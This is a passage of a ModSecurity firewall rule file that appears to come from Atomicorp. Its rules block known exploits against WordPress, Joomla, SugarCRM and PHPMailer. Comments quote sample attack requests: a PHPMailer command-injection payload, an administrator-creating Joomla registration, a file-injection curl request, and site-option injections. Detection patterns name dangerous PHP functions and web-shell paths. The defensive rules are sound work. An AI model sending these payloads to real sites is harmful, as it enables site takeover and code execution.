"t:none,t:urlDecodeUni,t:lowercase" SecRule ARGS:wcuf_current_upload_session_id "(?:\.\./\.\.|ph(?:p|tml|t))" "phase:2,id:322182,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WooCommerce Unauthenticated Arbitrary File Upload attack',severity:2" #phphp SecRule ARGS:wcuf_file_name "ph(?:p|tml|t)" "phase:2,id:322183,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WooCommerce Unauthenticated Arbitrary File Upload attack',severity:2" SecRule ARGS:action "gdlr_lms_cancel_booking" "phase:2,id:322102,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SQL Injection attack against WP Good Layers Plugin (CVE-2020-27481)',severity:2,tag:'SQLi'" SecRule ARGS:file[title] "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "phase:2,id:322172,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Download Manager XSS attack (CVE-2013-7319)',severity:2" SecRule ARGS:action "elementor_ajax" "chain,phase:2,id:322112,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Elementor Pro File Upload attack attack',severity:2" SecRule REQUEST_HEADERS:Referer "post-new\.php\?post_type=elementor_icons" "t:none,t:urlDecodeUni,t:htmlEntityDecode,chain" SecRule REQUEST_BODY "pro_assets_manager_custom_icon_upload\x22:\{\x22action\x22:\x22pro_assets_manager_custom_icon_upload\x22" "chain,t:none,t:urlDecode,t:htmlEntityDecode,t:compressWhitespace" SecRule FILES "\.(zip|php\d?|p?html)$" "t:none,t:urlDecodeUni,t:lowercase" SecRule ARGS:action "dnd_codedropz_upload" "chain,phase:2,id:322113,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drag and Drop Upload Contact Form Code Injection attack',severity:2" SecRule &ARGS:upload-file "@ge 1" "chain,t:none" SecRule ARGS:supported_type|ARGS:filename "%" "t:none,t:urlDecodeUni" SecRule ARGS:action "import_widget_data" "chain,phase:2,id:322114,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Widget Importer/Export RFI attack',severity:2" SecRule ARGS:name "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)://" "t:none,t:urlDecodeUni,t:lowercase" SecRule ARGS:action "mapp_tpl_" "chain,phase:2,id:322115,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MapPress Maps path recursion attack',severity:2" SecRule ARGS:name "\.\./\.\." "t:none,t:urlDecodeUni,t:normalizePath" #action=tnpc_render,b=html SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:383709,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: KingComposer XSS attack blocked',severity:2" SecRule ARGS:action "kc_install_online_preset" "t:none,t:urlDecodeUni,t:lowercase" SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:322222,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP CommentLuv XSS attack blocked',severity:2" SecRule ARGS:_ajax_nonce "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase" SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:303669,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Adning PHP code injection attack blocked',severity:2" SecRule ARGS:action "_ning_upload_image" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:allowed_file_types "(?:php|zip)" "t:none,t:urlDecodeUni,t:lowercase" SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:303668,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Adning PHP code injection attack blocked',severity:2" SecRule ARGS:action "_ning_remove_image" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:uid "\.\./\.\./\.\." "t:none,t:urlDecodeUni,t:cmdline" #action=tnpc_render,b=html SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:303768,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Newsletter Plugin attack blocked',severity:2" SecRule ARGS:action "tnpc_render" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:b "html" "t:none,t:urlDecodeUni,t:lowercase" #action=tnpc_render,b=html SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:303769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Newsletter Plugin PHP objection insertion attack blocked',severity:2" SecRule ARGS:action "tnpc_render" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:options[inline_edits] "(<|php|\{)" "t:none,t:urlDecodeUni,t:lowercase" #/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:393767,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Arbitrary File Upload Vulnerability in Jssor Slider attack blocked',severity:2" SecRule ARGS:param "upload_slide" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:param "upload_library" "t:none,t:urlDecodeUni,t:lowercase" #Added if users disable generic wp-config file download protection rules SecRule ARGS:action "duplicator_download" "chain,phase:2,deny,log,auditlog,id:323769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: wp-config file download attack via duplicator plugin blocked',severity:2" SecRule ARGS:file "(?:wp-config|\../\..)" "t:none,t:urlDecodeUni,t:lowercase" #Release granted from encrypted embargo rules 3/4/20 SecRule ARGS:action "sent_gift_certificate" "phase:2,deny,log,auditlog,id:383769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WooCommerce attack blocked',severity:2" #/wp-admin/admin-ajax.php?action=subscribe_email&cs_email=1@1 SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:393769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress ajaxServersettingschk command injection attack blocked',severity:2" SecRule ARGS:cs_email "1@1" "t:none,t:urlDecodeUni" SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:393768,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress ajaxServersettingschk command injection attack blocked',severity:2" SecRule ARGS:rootuname ";" "t:none,t:urlDecodeUni" SecRule ARGS:page "^301bulkoptions$" "phase:2,deny,log,auditlog,id:393751,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress 301bulkoptions attack blocked',severity:2" Secrule REQUEST_URI "admin-ajax\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347147,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax XSS attack',logdata:'%{TX.0}'" SecRule ARGS:domain "(?:<|>)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:replaceComments,t:removeNulls,t:removewhitespace,t:lowercase" Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax Live Chat plugin XSS attack',logdata:'%{TX.0}'" SecRule ARGS:wplc_custom_js "(?:<|script|>)" "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:removewhitespace,t:lowercase" #$ curl https://VICTIM.COM/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt' SecRule ARGS:action "swpsmtp_clear_log" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347149,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax file injection attack',logdata:'%{TX.0}'" SecRule ARGS:swpsmtp_import_settings "1" "chain,t:none,t:utf8toUnicode,t:urlDecodeUni" SecRule &ARGS:swpsmtp_import_settings_file "!^0$" "t:none" #class-donor-table.php #Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax Live Chat plugin XSS attack',logdata:'%{TX.0}'" #SecRule ARGS:wplc_custom_js "(?:<|script|>)" "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:removewhitespace,t:lowercase" #action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22users_can_register%22%2C%22value%22+%3A%221%22%7D&security= Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347150,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: WordPress GDPR Compliance Plugin Exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:action "wpgdprc_process_action" "t:none,t:lowercase,chain" SecRule ARGS:data "(?:administrator|users_can_register|https?)" "t:none,t:lowercase" #action=kiwi_social_share_set_option&args%5Bgroup%5D=users_can_register&args%5Bvalue%5D=1 Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347151,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:action "kiwi_social_share_set_option" "t:none,t:lowercase,chain" SecRule ARGS "(?:administrator|users_can_register)" "t:none,t:lowercase" #action=td_ajax_update_panel&wp_option%5Busers_can_register%5D=1 Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347152,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:action "td_ajax_update_panel" "t:none,t:lowercase,chain" SecRule ARGS:/wp_option/ "(?:administrator|users_can_register|https?)" "t:none,t:lowercase" #action=td_mod_register&email=master%40createsimpledomain.icu&user=mastericuuu Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347153,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:action "td_mod_register" "t:none,t:lowercase" #action=cp_add_subscriber&cp_set_user=administrator&message=hello¶m%5Bemail%5D=master%40createsimpledomain.icu #action=cp_add_subscriber&cp_set_user=administrator&cp_set_user=administrator&message=hello&message=letitbe¶m%5Bemail%5D=master%40createsimpledomain.icu¶m%5Bemail%5D=master%40createsimpledomain.icu #action=cp_add_subscriber&cp_set_user=administrator&message=hello¶m%5Bemail%5D=master%40createsimpledomain.icu #action=cp_add_subscriber&cp_set_user=administrator&cp_set_user=administrator&message=hello&message=letitbe¶m%5Bemail%5D=master%40createsimpledomain.icu¶m%5Bemail%5D=master%40createsimpledomain.icu Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347154,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:cp_add_subscriber "td_ajax_update_panel" "t:none,t:lowercase,chain" SecRule ARGS:cp_set_user "administrator" "t:none,t:lowercase" Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347155,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:wplc_custom_js "fromcharcode" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase" Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347156,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:action|ARGS:otw_pctl_action "(?:ewd_ufaq_updateoptions|gen_save_cssfixfront|manage_otw_pctl_options|savegooglecode)" "t:none,t:lowercase,chain" SecRule ARGS:/custom_css/|ARGS:home "fromcharcode" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase" Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347157,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:action "thim_update_theme_mods" "t:none,t:lowercase,chain" SecRule ARGS:thim_value "(?:https?|fromcharcode|script)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase" #/wp-admin/admin-post.php?yp_remote_get #yp_json_import_data=%5B%7B%22home%22%3A%22aHR0cHM6Ly9kZXN0cm95Zm9ybWUuY29tL3Q%2FdD0xJg%3D%3D%22%7D%5D Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347158,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:yp_json_import_data "(?:home|siteurl|http)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:yp_remote_get "[0-9a-z]" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase" Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347159,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:CP_ABC_post_edition "1" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:editionarea "(?:https?|fromcharcode|script)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase" #/wp-admin/admin-ajax.php?action=wcp_change_post_width Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347160,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:action "wcp_change" "t:none,t:lowercase,chain" SecRule ARGS:width|ARGS:height "(?:https?|fromcharcode|script)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase" SecMarker END_PHP_ADMIN_AJAX #/wp-content/plugins/yuzo-related-post/assets/js/admin.js SecRule REQUEST_URI "/wp-content/plugins/yuzo" "phase:2,deny,log,auditlog,id:382245,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Access attempt or probe for known vulnerable yuzo-related-post Plugin blocked'" #GET /admin.php?dispatch=auth.login_form&return_url=admin.php SecRule REQUEST_URI "admin\.php" "chain,phase:2,deny,log,auditlog,id:382241,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auth.login_form probe blocked'" SecRule ARGS:dispatch "auth\.login_form" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:return_url "^admin\.php$" "t:none,t:urlDecodeUni,t:lowercase" #GET /admin/index.php?route=common/login SecRule REQUEST_URI "index\.php" "chain,phase:2,deny,log,auditlog,id:382242,rev:4,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auth.login_form probe blocked'" SecRule ARGS:route "common/login" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule REQUEST_METHOD "GET" "t:none,chain" SecRule REQUEST_HEADERS:Referer "!(\?route=)" "t:none,t:lowercase" #wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php SecRule REQUEST_URI "sf-booking/lib/downloads\.php" "chain,phase:2,deny,log,auditlog,id:393743,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Service Finder Booking Local File Disclosure blocked'" SecRule ARGS:file "/" "t:none,t:urlDecodeUni" #phpCollab 2.5.1 Unauthenticated File Upload SecRule REQUEST_URI "logos_clients/.*\.ph(?:p|tml|t)" "phase:2,deny,log,auditlog,id:391746,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCollab 2.5.1 Unauthenticated File Upload blocked'" #status_rrd_graph_img.php?database=queues; SecRule REQUEST_URI "status_rrd_graph_img\.php" "chain,phase:2,deny,log,auditlog,id:391747,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress LearnDash 2.5.3 File Upload'" SecRule ARGS:database ";" "t:none,t:urlDecodeUni" # WP Cherry Plugin Exploit Unrestricted File Upload SecRule REQUEST_URI "cherry-plugin/admin/import-export/upload.php" "chain,phase:2,deny,log,auditlog,id:391756,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Cherry Plugin Unauthenticated File Upload blocked'" SecRule REQUEST_METHOD "POST" "t:none" #wp-content/uploads/assignments/shell.php. SecRule REQUEST_URI "wp-content/uploads/assignments/.*\.ph(?:p|tml|t)" "phase:2,deny,log,auditlog,id:391748,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress LearnDash 2.5.3 File Upload'" #/components/com_advertisementboard/efiles/[shell].php SecRule REQUEST_URI "/components/com_advertisementboard/efiles/.*\.ph(?:p|tml|t)" "phase:2,deny,log,auditlog,id:391749,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Advertisement board Joomla classifieds extension 3.2.0 - Remote Shell Upload Vulnerability blocked'" #GET admin/utilities/elfinder_init?cmd=mkfile&name=shell.php5&target=[dir] SecRule REQUEST_URI "admin/utilities/elfinder_init" "chain,phase:2,deny,log,auditlog,id:391759,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PerfexCRM 1.9.7 a Unrestricted php5 File upload blocked'" SecRule ARGS:cmd "mkfile" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:name "ph\.(?:p|tml|t)" "t:none,t:urlDecodeUni,t:lowercase" #demo/campaign/user-export.php #demo/campaign/info.php SecRule REQUEST_URI "demo/campaign/(?:user-export|info)\.php" "phase:2,deny,log,auditlog,id:390747,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Boost My Campaign 1.1 Unauthenticated Administrative Access blocked'" #action=td_ajax_update_panel&wp_option%5Bdefault_role%5D=administrator SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "chain,capture,phase:2,deny,log,auditlog,id:390769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Theme Newspaper 6.7.1 - Privilege Escalation attack'" SecRule ARGS:action "td_ajax_update_panel" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:/wp_option/ "(?:administrator|users_can_register)" "t:none,t:lowercase,t:urlDecodeUni" #payload = ""attacker' -oQ/tmp/ -X%s/phpcode.php some"@email.com" % RW_DIR #payload = '"attacker" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR SecRule ARGS:email|ARGS:from|ARGS:sender|ARGS:name "(?:-oQ ?\.?\.?/|-X.*php)" "capture,phase:2,deny,log,auditlog,id:390849,rev:2,t:none,t:UrlDecodeUni,t:compressWhiteSpace,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPMailer remote code execution attack'" #joomla #/component/users/?task=user.register #form[option]=com_users&user[password1]=password&user[username]=hacker&form[email2]=hacker@example.com&57e059d466318587a8f989565046e656=1&form[password2]=password&user[email2]=hacker@example.com&form[task]=user.register&user[password2]=password&user[name]=hacker&user[email1]=hacker@example.com&user[groups][]=7&form[name]=hacker&user[activation]=0&form[password1]=password&form[username]=hacker&form[email1]=hacker@example.com&user[block]=0 SecRule REQUEST_URI "/component/users/\?task=user\.register" "chain,capture,phase:2,deny,log,auditlog,id:390749,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla privilege escalation attack'" SecRule ARGS:form[option] "com_users" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:user[groups][] "7" "t:none,t:urlDecodeUni" #Vuln vulnerable joomla plugin SecRule REQUEST_URI "modules/mod_simplefileuploadv1\.3" "phase:2,deny,log,auditlog,id:390746,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Known Vulnerable Joomla Simple File Upload v1.3 Access blocked'" #known malware #A.php?username=himel_site&db=himel_base&edit=jos_users&where%5Bid%5D=62 SecRule &ARGS:username "@eq 1" "chain,capture,phase:2,deny,log,auditlog,id:390745,rev:1,t:none,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Known PHP malware'" SecRule &ARGS:db "@eq 1" "t:none,chain" SecRule ARGS:edit "(?:jos_users|insp_users)" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule &ARGS:where[id] "@eq 1" "t:none" #http://localhost/path//administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes SecRule REQUEST_URI "quixplorer" "chain,capture,phase:2,deny,log,auditlog,id:390744,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla com aceftp Arbitrary File Download Vulnerability'" SecRule ARGS:action "download" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:item "configuration\.php" "t:none,t:urlDecodeUni,t:lowercase" SecRule REQUEST_URI "/(?:upload|sugarrestserialize)\.php" "chain,capture,phase:2,deny,log,auditlog,id:391744,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SugarCRM PHP Code injection attack'" SecRule ARGS:/ext_rest_insideview/|ARGS:rest_data "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|base64_decode|decode_base64|rot13|base64_url_decode)\b ?(?:\(|\:)|\b(?:system|include)\b ?\((?:\'|\"|\$))" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace" SecRule REQUEST_URI "/index\.php" "chain,capture,phase:2,deny,log,auditlog,id:391745,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SugarCRM Insecure fopen attack'" SecRule ARGS:type_module "expect\://" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace" #/movefile.php SecRule REQUEST_URI "/movefile\.php" "chain,capture,phase:2,deny,log,auditlog,id:391741,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Roxy File Manager Shell Upload Attack'" SecRule ARGS:n "\.ph(?:p|t)" "t:none,t:urlDecodeUni,t:lowercase" #ehcpbackup.php SecRule REQUEST_URI "/ehcpbackup.php" "capture,phase:2,deny,log,auditlog,id:391739,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Easy Hosting Control Panel plaintext password attack denied'" #/wp-content/plugins/wp-mobile-detector/resize.php?src=.*php SecRule REQUEST_URI "/wp-content/plugins/wp-mobile-detector/resize\.php" "chain,capture,phase:2,deny,log,auditlog,id:391740,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress WP Mobile Detector 3.5 Shell Upload'" SecRule ARGS:src "\.ph(?:p|t)" "t:none,t:urlDecodeUni,t:lowercase" #ehcp/test/up2.php #http:///ehcp/test/upload2.php #http:///ehcp/test/upload.php #http:///ehcp/test/up.php SecRule REQUEST_URI "/ehcp/test/up" "capture,phase:2,deny,log,auditlog,id:391709,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Easy Hosting Control Panel Unauthenticated File upload attack denied'" #http://localhost/pivotx_latest/pivotx/ #index.php?page=media&file=imageshell.png&pivotxsession=ovyyn4ob2jc5ym92&answer= #shell.php SecRule REQUEST_URI "/pivotx/" "chain,capture,phase:2,deny,log,auditlog,id:393739,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PivotX shell upload attack denied'" SecRule ARGS:answer "\.php" "t:none,t:urlDecodeUni,t:lowercase" #admin-logs.php SecRule REQUEST_URI "/admin-logs.php" "chain,capture,phase:2,deny,log,auditlog,id:393738,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zenphoto RFI attack denied'" SecRule ARGS:tab "^(?:ogg|tls|gopher|data|php|glob|phar|dict|ssh2|rar|expect|zip|zlib|(?:ht|f)tps?):/" #/php-utility-belt/ajax.php SecRule REQUEST_URI "/php-utility-belt/ajax\.php" "capture,phase:2,deny,log,auditlog,id:393737,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP utility belt access denied'" #ui/js/3rd/plupload/examples/upload.php SecRule REQUEST_URI "ui/js/3rd/plupload/examples/upload\.php" "capture,phase:2,deny,log,auditlog,id:393734,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Yeager CMS unauthenticated upload blocked'" #libs/org/adodb_lite/tests/ SecRule REQUEST_URI "libs/org/adodb_lite/tests/" 